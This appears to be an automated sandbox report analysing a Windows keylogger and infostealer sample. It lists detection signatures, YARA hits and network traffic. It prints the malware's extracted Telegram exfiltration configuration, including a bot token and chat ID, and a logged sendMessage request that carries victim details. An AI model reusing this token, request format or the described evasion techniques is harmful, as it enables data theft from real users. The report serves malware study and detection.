Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9L83v5j083.exe

Overview

General Information

Sample name:9L83v5j083.exe
renamed because original name is a hash value
Original sample name:909a74c7a03956c55492863028a975ccf0917f54fab5d4fa8cfa2bfa8e480ed9.exe
Analysis ID:1588012
MD5:fa59fc9d6c2af739eaa63d3af4d6f428
SHA1:0550a7caae5cbe592ada14d028601c95cc9c678b
SHA256:909a74c7a03956c55492863028a975ccf0917f54fab5d4fa8cfa2bfa8e480ed9
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 9L83v5j083.exe (PID: 2448 cmdline: "C:\Users\user\Desktop\9L83v5j083.exe" MD5: FA59FC9D6C2AF739EAA63D3AF4D6F428)
    • svchost.exe (PID: 428 cmdline: "C:\Users\user\Desktop\9L83v5j083.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7321210888:AAF5VQB5xBwH7bEync-Cxbbe1Ehqi_-yItA", "Chat id": "5094780368", "Version": "4.4"}
{"Exfil Mode": "Telegram", "Token": "7321210888:AAF5VQB5xBwH7bEync-Cxbbe1Ehqi_-yItA", "Chat_id": "5094780368", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x3572b:$a1: get_encryptedPassword
          • 0x356ff:$a2: get_encryptedUsername
          • 0x357c3:$a3: get_timePasswordChanged
          • 0x356db:$a4: get_passwordField
          • 0x35741:$a5: set_encryptedPassword
          • 0x3550e:$a7: get_logins
          • 0x30e64:$a10: KeyLoggerEventArgs
          • 0x30e33:$a11: KeyLoggerEventArgsEventHandler
          • 0x355e2:$a13: _encryptedPassword
          Click to see the 29 entries
          SourceRuleDescriptionAuthorStrings
          2.2.svchost.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 A0 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          2.2.svchost.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 A0 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          0.2.9L83v5j083.exe.3e40000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 A0 88 44 24 2B 88 44 24 2F B0 F1 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          2.2.svchost.exe.7d00000.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.svchost.exe.7d00000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              Click to see the 76 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\9L83v5j083.exe", CommandLine: "C:\Users\user\Desktop\9L83v5j083.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9L83v5j083.exe", ParentImage: C:\Users\user\Desktop\9L83v5j083.exe, ParentProcessId: 2448, ParentProcessName: 9L83v5j083.exe, ProcessCommandLine: "C:\Users\user\Desktop\9L83v5j083.exe", ProcessId: 428, ProcessName: svchost.exe
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\9L83v5j083.exe", CommandLine: "C:\Users\user\Desktop\9L83v5j083.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\9L83v5j083.exe", ParentImage: C:\Users\user\Desktop\9L83v5j083.exe, ParentProcessId: 2448, ParentProcessName: 9L83v5j083.exe, ProcessCommandLine: "C:\Users\user\Desktop\9L83v5j083.exe", ProcessId: 428, ProcessName: svchost.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T20:33:27.075924+010028033053Unknown Traffic192.168.2.549706104.21.32.1443TCP
              2025-01-10T20:33:29.651049+010028033053Unknown Traffic192.168.2.549710104.21.32.1443TCP
              2025-01-10T20:33:32.226356+010028033053Unknown Traffic192.168.2.549714104.21.32.1443TCP
              2025-01-10T20:33:36.136220+010028033053Unknown Traffic192.168.2.549720104.21.32.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T20:33:25.338902+010028032742Potentially Bad Traffic192.168.2.549704193.122.6.16880TCP
              2025-01-10T20:33:26.463942+010028032742Potentially Bad Traffic192.168.2.549704193.122.6.16880TCP
              2025-01-10T20:33:27.760812+010028032742Potentially Bad Traffic192.168.2.549707193.122.6.16880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T20:33:37.119743+010018100071Potentially Bad Traffic192.168.2.549721149.154.167.220443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 9L83v5j083.exeAvira: detected
              Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7321210888:AAF5VQB5xBwH7bEync-Cxbbe1Ehqi_-yItA", "Chat_id": "5094780368", "Version": "4.4"}
              Source: 2.2.svchost.exe.7d00000.4.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7321210888:AAF5VQB5xBwH7bEync-Cxbbe1Ehqi_-yItA", "Chat id": "5094780368", "Version": "4.4"}
              Source: 9L83v5j083.exeVirustotal: Detection: 70%Perma Link
              Source: 9L83v5j083.exeReversingLabs: Detection: 68%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: 9L83v5j083.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: 9L83v5j083.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 192.168.2.5:49710 -> 104.21.32.1:443 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: Binary string: _.pdb source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: 9L83v5j083.exe, 00000000.00000003.2060217207.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, 9L83v5j083.exe, 00000000.00000003.2060342834.0000000004060000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: 9L83v5j083.exe, 00000000.00000003.2060217207.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, 9L83v5j083.exe, 00000000.00000003.2060342834.0000000004060000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09072834h2_2_09072580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09073206h2_2_09072DE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907CF7Ch2_2_0907CCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09070D10h2_2_09070B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907169Ah2_2_09070B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907D3D4h2_2_0907D128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09073206h2_2_09073134
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907D82Ch2_2_0907D580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907DC84h2_2_0907D9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 09073206h2_2_09072DE2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_09070040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907FAECh2_2_0907F840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_09070856
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907EDE4h2_2_0907EB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907F23Ch2_2_0907EF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907F694h2_2_0907F3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907E0DCh2_2_0907DE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_09070676
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907E534h2_2_0907E288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0907E98Ch2_2_0907E6E0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49721 -> 149.154.167.220:443
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.32.1 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.122.6.168 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficTCP traffic: 192.168.2.5:57905 -> 1.1.1.1:53
              Source: global trafficTCP traffic: 192.168.2.5:58627 -> 162.159.36.2:53
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:48:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
              Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
              Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.6.168:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.32.1:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49720 -> 104.21.32.1:443
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 192.168.2.5:49710 -> 104.21.32.1:443 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20and%20Time:%2011/01/2025%20/%2001:48:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20287400%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
